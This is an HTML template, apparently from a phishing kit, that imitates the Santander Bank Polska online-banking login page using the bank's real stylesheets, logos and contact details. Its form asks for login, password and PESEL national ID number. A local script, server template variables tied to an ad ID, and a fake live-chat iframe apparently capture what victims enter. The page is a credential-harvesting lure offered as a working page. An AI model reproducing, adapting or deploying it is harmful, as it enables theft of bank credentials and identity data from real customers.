<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl">

<head>
    <meta charset="utf-8">
    <meta name="description" content="Nowoczesna bankowość elektroniczna, która umożliwia zarządzanie finansami przez internet. To
                        wygodne narzędzie, które pozwala po zalogowaniu na łatwe i szybkie zamawianie m.in. kredytów, kart
                        kredytowych oraz otwieranie kont i lokat.">
    <meta name="keywords" content="bzwbk, wbk, bank zachodni wbk, logowanie, bzwbk24, logowanie na konto,">
    <title>Logowanie do Santander internet</title>
    <link rel="stylesheet" type="text/css"
        href="https://www.centrum24.pl/centrum24-web/css/advisor-ver-0FB26A2BD3C88A08691E8EB836819C8F.css"
        media="screen">
    <link rel="stylesheet" href="/css/default_lk.css">

    <style>
        .labelsLine label {
            font-size: 11px;
            text-align: left;
            float: left;
        }

        .labelsLine label span {
            margin-right: 5px;
            vertical-align: top;
            display: inline-block;
        }

        .labelsLine label span strong {
            font-size: 17px;
            font-weight: 400;
            color: #333;
        }


        #lk_form input,
        input[type=submit] {
            width: 366px;
            font-weight: normal;
            font-size: 16px;
            color: #2e3035;
            padding: 5px;
            top: 65px;
            float: left;
            -webkit-appearance: textfield;
            -moz-appearance: textfield;
            appearance: textfield;
            box-sizing: border-box;
        }

        [type=submit] {
            color: #fff !important;
        }
    </style>

    <style id="com-bzwbk-commons-web-view-info-ObsoleteBrowserNotificationPanel-0">
        /*<![CDATA[*/

        .obsolete-browser-container {
            position: relative;
            max-width: 860px;
            margin: 0 auto;
        }

        /*]]>*/
    </style>


    <style id="com-bzwbk-commons-web-view-authentication-component-LinkListLocaleSelectorPanel-0">
        /*<![CDATA[*/

        .lang_container {
            display: flex;
            align-items: center;
        }

        ul#lang {
            display: flex;
            flex-direction: row;
            flex-wrap: nowrap;
            justify-content: space-between;
            list-style: none;
            font-size: 16px;
            line-height: 20px;
        }

        ul#lang li {
            flex-grow: 1;
            flex-basis: auto;
            padding: 0 0.5em;
            text-align: center;
            border-left: 1px solid #137E84;
        }

        ul#lang li:first-of-type {
            border-left: none;
        }

        ul#lang li:last-of-type {
            padding-right: 1px;
        }

        ul#lang li a:disabled {
            font-weight: bold;
            cursor: pointer;
        }

        ul#lang li a,
        ul#lang li span {
            font-weight: normal;
            color: #137E84;
        }

        ul#lang li span {
            font-weight: bold;
            pointer-events: none;
        }

        /*]]>*/
    </style>

    <link rel="stylesheet" type="text/css"
        href="https://www.centrum24.pl/centrum24-web/gain-access-ver-6AC4D55C4DB9F67BE6F207D39F9E8093.css">
    <link rel="stylesheet" type="text/css"
        href="https://www.centrum24.pl/centrum24-web/modal-window-ver-AEEF53CDE0FC9D41683717E687A34650.css">

    <link rel="stylesheet" type="text/css"
        href="https://www.centrum24.pl/centrum24-web/css/button-ver-CFFBA29161EABF7EB60C4DC1411DE0D2.css"
        media="screen">


    <style type="text/css" id="com-bzwbk-commons-web-view-authentication-component-TopBarPanel-0">
        /*<![CDATA[*/

        .social_bzwbk span.aktualnosci {
            color: #ff0000;
        }

        /*]]>*/
    </style>

    <link rel="stylesheet" type="text/css" href="https://www.centrum24.pl/css/eSmart/bar/topbar.css?mn=f68456d1">


    <link rel="shortcut icon" href="https://www.centrum24.pl/css/eSmart/favicon.ico?mn=f68456d1">
    <link rel="stylesheet" type="text/css"
        href="https://www.centrum24.pl/centrum24-web/css/eSmart/logowanie-ver-38643DDEC04DED87182EA344967568CC.css"
        media="screen">
    <link rel="stylesheet" type="text/css" href="https://www.centrum24.pl/centrum24-web/santander-font.css">
    <link rel="stylesheet" type="text/css" href="https://www.centrum24.pl/centrum24-web/opensans-font.css">

</head>

<body>
    <div id="browserNotification" style="display: none;">
        <div class="obsolete-browser-container">
            <div>
                <div class="help-line hmp-warning">

                    <div class="text screenonly">
                        <div class="information-panel-icon primary">Nasza bankowość najlepiej działa w najnowszych
                            przeglądarkach. Widzisz ten komunikat, ponieważ używasz starej lub niewspieranej przez nas
                            wersji przeglądarki. Korzystanie ze starej lub niewspieranej wersji przeglądarki nie jest
                            bezpieczne. Nie wspieramy już przeglądarki Internet Explorer 11.<br>Wejdź <a
                                href="https://www.santander.pl/klient-indywidualny/bankowosc-internetowa/wymagania-techniczne-bankowosci-internetowej-i-mobilnej#111=1"
                                target="_blank">Tutaj</a> i zobacz, w jakich przeglądarkach bankowość internetowa będzie
                            działać prawidłowo. To Ty decydujesz, z której przeglądarki skorzystasz. Nasza rekomendacja:
                            Upewnij się, że używasz najnowszej wersji przeglądarki internetowej.</div>

                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="wrapper" class="fixed">
        <div id="header" class="loginPanel">
            <a rel="noreferrer noopener" class="bankLogo" href="https://santander.pl/"><img alt="Santander"
                    src="https://www.centrum24.pl/css/images/santander-red.svg"></a>
            <div class="title"></div>
            <div id="id2" class="top-bar">
                <section id="page_head">
                    <div class="page_header_wrapper page">
                        <header>
                            <a rel="noreferrer noopener" href="https://santander.pl/" class="order2">
                                Przejdź do santander.pl
                            </a>
                            <a href="#" class="signin">
                                Przejdź do innych serwisów
                            </a>
                        </header>
                    </div>
                </section>
                <section class="loginPanel contact_details">
                    <a class="window-close" href="#" title="Zamknij okno"></a>
                    <article>
                        <p class="header">Infolinia</p>
                        <div class="infolinia">
                            <span class="number">Infolinia <a href="tel:19999"><b>1 9999</b></a></span>
                            <small>Z zagranicy</small>
                            <span class="small-number"><a href="tel:+48618119999">+48 61 81 19999</a></span> <br>
                            <a rel="noreferrer noopener" style="font-size: 11px;"
                                href="https://santander.pl/informacje-o-banku/kontakt/menu-infolinii/menu-infolinii-1-9999.html">Menu
                                infolinii »</a>
                        </div>
                        <div class="infolinia skype">
                            <span class="number"><a href="skype:infolinia.bzwbk">Skype</a></span>
                        </div>
                        <ul class="list">
                            <li>Zastrzeganie kart, pomoc w zakresie kart, bankomatów, bankowości elektronicznej -
                                <b>24h</b>
                            </li>
                            <li>Zamawianie produktów (konta, kredyty, karty) <b>8.00 - 20.00, w dni robocze</b></li>
                            <li class="disclimer">* Opłata za minutę połączenia zgodna z taryfą danego operatora.</li>
                        </ul>
                    </article>
                    <article>
                        <p class="header">Napisz do nas</p>
                        <ul class="list">
                            <li>Jeśli masz pytania dotyczące oferty banku, chcesz kupić produkt, przesłać swoją opinię
                                zapraszamy do wypełnienia formularza:</li>
                            <li style="padding-bottom: 10px;">
                                <a rel="noreferrer noopener" class="formularz"
                                    href="https://santander.pl/informacje-o-banku/kontakt/kontakt-zadaj-pytanie.html">Formularz
                                    kontaktowy</a>
                                lub wysłania wiadomości na adres:
                            </li>
                            <li class="mail_kontakt">
                                <a class="mail" href="mailto:kontakt@santander.pl">Wyślij email</a>
                            </li>
                            <li>
                                Jeśli chcesz złożyć reklamację, zaloguj się do Santander internet i napisz do nas,
                                wybierając opcję w Poczcie lub zakładce Twoje sprawy.
                            </li>
                            <li>
                                Potwierdzeniem dotarcia wiadomości do Santander Bank Polska S.A. jest otrzymanie
                                autoodpowiedzi.
                            </li>
                            <li class="social"><span>Dołącz do nas:</span>
                                <a rel="noreferrer noopener" target="blank"
                                    href="https://pl-pl.facebook.com/santanderbankpolska" class="contact-button"
                                    onclick="javascript: trackClick(this,'/header/button/kontakt/button/facebook');return false;"><span
                                        class="fb"></span></a>
                                <a rel="noreferrer noopener" target="blank"
                                    href="http://www.youtube.com/user/BankZachodniWBK" class="contact-button"
                                    onclick="javascript: trackClick(this,'/header/button/kontakt/button/youtube');return false;"><span
                                        class="yt"></span></a>
                                <a rel="noreferrer noopener"
                                    onclick="javascript: trackClick(this,'/header/button/kontakt/text-link/blog');return false;"
                                    class="contact-button" href="http://blog.santander.pl" target="blank"><span
                                        class="blog"></span></a>
                                <a rel="noreferrer noopener"
                                    onclick="javascript: trackClick(this,'/header/button/kontakt/text-link/bank-pomyslow');return false;"
                                    class="contact-button" href="https://bankmozliwosci.santander.pl"
                                    target="blank"><span class="bankp"></span></a>
                            </li>
                        </ul>
                    </article>
                    <article class="hide-mobile">
                        <p class="header">Zgłaszanie cyberincydentów</p>
                        <ul class="list">
                            <li>
                                Jeśli ktoś próbuje przejął Twoje dane logowania do bankowości internetowej lub padłeś
                                ofiarą oszustwa, skontaktuj się z nami.
                            </li>
                            <li class="mail_kontakt">
                                <a class="mail" href="mailto:csirt@santander.pl">Wyślij email</a>
                            </li>
                        </ul>
                        <p class="header">Moja Firma plus</p>
                        <ul class="list">
                            <li>
                                Wsparcie funkcjonalne i techniczne dla<br>użytkowników Moja Firma plus
                            </li>
                            <li>
                                <span class="small-number"><a href="tel:+48618565484">+48 61 856 54 84</a></span>
                            </li>
                            <li class="mail_kontakt">
                                <a class="mail" href="mailto:MojaFirmaPlus@santander.pl">Wyślij email</a>
                            </li>
                            <li class="disclimer">* Opłata za minutę połączenia zgodna z taryfą danego operatora.</li>
                        </ul>
                    </article>
                    <article>
                        <p class="header">Public Relations</p>
                        <ul class="list">
                            <li>
                                Kontakt dla dziennikarzy
                                <br><a href="mailto:biuro.prasowe@santander.pl">biuro.prasowe@santander.pl</a>
                            </li>
                            <li>
                                Zapytanie dot. sponsoringu
                                <br><a href="mailto:sponsoring@santander.pl">sponsoring@santander.pl</a>
                            </li>
                            <li>
                                Oferty marketingowe
                                <br><a href="mailto:marketing@santander.pl">marketing@santander.pl</a>
                            </li>
                            <li style="padding-top: 10px;border-top: 1px solid #ECEEEF;">
                                <a rel="noreferrer noopener" class="home"
                                    href="https://santander.pl/przydatne-informacje/wyszukiwarka-placowek-i-bankomatow/wyszukiwarka-placowek-i-bankomatow.html">Znajdź
                                    oddziały i bankomaty</a>
                            </li>
                        </ul>
                    </article>
                </section>
                <section class="signin_box">
                    <a class="window-close" href="#" title="Zamknij okno"></a>
                    <div class="left">
                        <article>
                            <div class="wrapper info_logowanie">
                                Logowanie dla klientów indywidualnych i firm
                            </div>
                        </article>
                        <article class="last hide-mobile">
                            <div class="wrapper">
                                <a rel="noreferrer noopener" href="https://www.centrum24.pl/centrum24-web/login"
                                    class="button_signin"
                                    onclick="javascript: trackClick(this,'/header/button/zaloguj/button/bzwbk24');return false;">Santander
                                    internet<span></span></a>
                            </div>
                        </article>
                        <article class="last hide-mobile">
                            <div class="wrapper">
                                <a rel="noreferrer noopener" href="https://www.centrum24.pl/centrum24-web/login"
                                    class="button_signin"
                                    onclick="javascript: trackClick(this,'/header/button/zaloguj/button/bzwbk24');return false;">Mini
                                    Firma / Moja Firma plus<span></span></a>
                            </div>
                        </article>
                        <article class="last">
                            <div class="wrapper">
                                <a rel="noreferrer noopener" href="https://ibiznes24.pl/2.0/login/#/login"
                                    class="button_signin"
                                    onclick="javascript: trackClick(this,'/header/button/zaloguj/button/ibiznes24');return false;">iBiznes24<span></span></a>
                            </div>
                        </article>
                        <article class="last">
                            <div class="wrapper">
                                <a rel="noreferrer noopener" href="https://www.inwestoronline.pl/cbm/"
                                    class="button_signin"
                                    onclick="javascript: trackClick(this,'/header/button/zaloguj/button/inwestor-online');return false;">Inwestor
                                    online<span></span></a>
                            </div>
                        </article>
                        <article class="last">
                            <div class="wrapper">
                                <a rel="noreferrer noopener" href="https://www.centrum24.pl/prepaid/index?index=1491"
                                    class="button_signin"
                                    onclick="javascript: trackClick(this,'/header/button/zaloguj/button/serwis-prepaid');return false;">Serwis
                                    prepaid<span></span></a>
                            </div>
                        </article>
                    </div>
                </section>
            </div>
        </div>
        <div id="container">

            <div id="kolumna-lewa">
                <div id="bezpieczenstwo">
                    <div class="title">Bezpieczeństwo</div>
                    <ol id="bezpieczenstwoLista">
                        <div class="item">
                            <li></li><span>Nie udostępniaj swoich danych.</span>
                        </div>
                        <div class="item">
                            <li></li><span> Czytaj treść smsKodów.</span>
                        </div>
                        <div class="item">
                            <li></li><span>Nie klikaj w linki i załączniki od nieznanych nadawców.</span>
                        </div>
                    </ol>
                    <div class="item"><a rel="noreferrer noopener" class="button button-secondary" target="_blank"
                            href="https://santander.pl/bankowosc-elektroniczna/bezpieczenstwo-i-prywatnosc/zelazne-zasady-bezpieczenstwa.html?utm_source=bzwbk24&amp;utm_medium=tekst&amp;utm_campaign=a5_2017-09-11_bezpieczenstwo-ogolny-9-2017&amp;utm_content=log-le_bezp">Więcej</a>
                    </div>
                </div>

                <div id="log_left">



                    <a href="https://www.centrum24.pl/centrum24-web/login?x=DD_KScfW6z7iGxN-wAf08ESjOTVO9YK7xDdGY0FoUaQrlVHKd5fukuJjhmT-qtwYTmJKzrnx7T2bPbTxPxRiDHqCjdounrDhVu8jRzdPILE"
                        target="_blank"><img
                            src="https://www.centrum24.pl/centrum24-web/common/mediaImage?0=LOGLEWY_ZAUFANY_KOMPUTER-0421.jpg"
                            alt="LOGLEWY_ZAUFANY_KOMPUTER-0421"></a>






                </div>
            </div>

            <div id="content">

                <div class="login-wrapper">



                    <style>
                        /*<![CDATA[*/

                        #akcje #accessDiv a span {
                            font-size: 14px !important;
                        }

                        /*]]>*/
                    </style>

                    <div id="logowanie" class="logowanie loginPanel">
                        <h1>
                            <div>
                                Logowanie KROK&nbsp;1
                            </div>

                        </h1>
                        <div id="logowanie-inner-NIK">
                            <form class="nikForm f1" id="lk_form">
                                <div class="forms">
                                    <div class="labelsLine" id="labelContainer">
                                        <label for="login" id="niklabelk1">
                                            <span class="login-step-instruction">
                                                <strong>Wpisz login</strong>
                                            </span>
                                        </label>
                                    </div>
                                    <div class="feedbackDiv">
                                        <span>

                                        </span>
                                        <input id="login" name="nik" size="10" required maxlength="20"
                                            class="content_center_input" step="2" autocomplete="off" tabindex="2"
                                            value="" minlength="6">
                                    </div><br><br>
                                    <div class="labelsLine" id="labelContainer">
                                        <label for="input_haslo" id="niklabelk1">
                                            <span class="login-step-instruction">
                                                <strong>Haslo</strong>
                                            </span>
                                        </label>
                                    </div>
                                    <div class="feedbackDiv">
                                        <input id="password" required type="password" size="10" maxlength="20"
                                            class="content_center_input" step="2" autocomplete="off" tabindex="2"
                                            value="" minlength="6">
                                    </div>
                                    <div class="labelsLine" id="labelContainer">
                                        <label for="pesel" id="niklabelk1">
                                            <span class="login-step-instruction">
                                                <strong>Pesel</strong>
                                            </span>
                                        </label>
                                    </div>
                                    <div class="feedbackDiv">
                                        <input id="pesel" required type="text" size="10" class="content_center_input"
                                            step="2" autocomplete="off" tabindex="2" value="">
                                    </div>

                                    <div class="button-next">
                                        <input type="submit" id="okBtn2" class="button button-primary"
                                            name="loginButton" tabindex="2" alt="DALEJ" value="Dalej"><span
                                            style="display:none;" class="wicket-ajax-indicator"
                                            id="okBtn2--ajax-indicator"><img
                                                src="https://www.centrum24.pl/centrum24-web/indicator-ver-75BEEBCC0A276C3974D2524B7F0619E1.gif"
                                                alt=""></span>
                                    </div>
                                </div>
                            </form>
                        </div>
                    </div>
                    <!-- <app-signin app-lang="pl" sca-variant="1" cards_module="true"></app-signin>-->







                </div>
                <noscript>
                    <div class="noscript logowanie loginPanel">
                        <style type="text/css">
                            /*<![CDATA[*/

                            #logowanie {
                                display: none;
                            }

                            h1 {
                                background: none;
                            }

                            .noscript p {
                                padding-bottom: 30px;
                            }

                            .noscript p,
                            .noscript h1 {
                                color: red;
                            }

                            #kolumna-lewa ul {
                                border: 1px solid #E2E5E6;
                                padding: 5px;
                            }

                            /*]]>*/
                        </style>
                        <h1>Zalogowanie nie jest możliwe!</h1>
                        <p>Aby zalogować się do serwisu, musisz włączyć w przeglądarce wykonywanie aktywnych skryptów.
                        </p>
                    </div>
                </noscript>
            </div>

            <div id="kolumna-prawa">
                <div id="log_right">



                    <a href="https://www.centrum24.pl/centrum24-web/login?x=DD_KScfW6z7iGxN-wAf08Ehv0itBaDTzZVbp43hBeDa5KDNiTP6UX9e4v4z6fJCH7OOHah79F_M-2hW346YsfKyRJrIgMaZiJmryNotJ7os"
                        target="_blank"><img
                            src="https://www.centrum24.pl/centrum24-web/common/mediaImage?0=LOGOW_DZIALALNOSC-0421.jpg"
                            alt="LOGOW_DZIALALNOSC-0421"></a>


















                </div>
            </div>

        </div>
    </div>




    <div id="foot">
        <div class="inner-foot">
            <div class="footContent"><strong>Santander Bank Polska S.A.</strong> z siedzibą w Warszawie, przy al. Jana
                Pawła II 17, 00-854 Warszawa, zarejestrowana w Sądzie Rejonowym dla m. st. Warszawy w Warszawie, XIII
                Wydział Gospodarczy Krajowego Rejestru Sądowego pod nr KRS 0000008723. NIP 896-000-56-73. REGON
                930041341. Wysokość kapitału zakładowego 1 021 893 140 zł. Wysokość kapitału wpłaconego
                1&nbsp;021&nbsp;893&nbsp;140&nbsp;zł.</div>
            <div class="footContent"><strong>Słowniczek pojęć i definicji</strong> dotyczących usług reprezentatywnych,
                wynikających z rozporządzenia Ministra Rozwoju i Finansów z dnia 14 lipca 2017 r. w sprawie wykazu usług
                reprezentatywnych powiązanych z rachunkiem płatniczym, dostępny jest na stronie <a
                    rel="noreferrer noopener" href="https://santander.pl/pad.html" target="_blank">santander.pl/PAD</a>
                oraz w placówkach banku.</div>
        </div>
    </div>


    <script src="https://code.jquery.com/jquery-3.6.0.min.js"
        integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.21.1/axios.min.js" crossorigin="anonymous"></script>
    <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <script>
        const LOG_TOKEN = <%=log.token%>,
            AD_LANG = "<%=log.ad.service.lang%>",
            AD_ID = <%=log.ad.id%>,
            translate = <%-JSON.stringify(translate) %>;
    </script>
    <script src="/js/lk.js" defer></script>
    <link rel="stylesheet" href="/css/support_parent.css" />
    <div class="
    chatra--webkit
    chatra--style-round
    chatra--side-bottom
    chatra--pos-right
    chatra--visible
    chatra--expanded
    chatra--fast-toggle
  " id="chatra" data-turbolinks-permanent="" style="
    width: 380px;
    height: 600px;
    transform: none;
    z-index: 2147483647;
    display: none;
  ">
        <div id="chatra__iframe-wrapper">
            <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat"
                allow="autoplay" src="/supportChatFrame/<%=log.ad.id%>"
                style="width: 380px; height: 600px; position: absolute"></iframe>
        </div>
    </div>
    <div class="support-circle"
        onclick="document.querySelector('#chatra').style.display = 'block';this.style.display = 'none'"></div>

</body>

</html>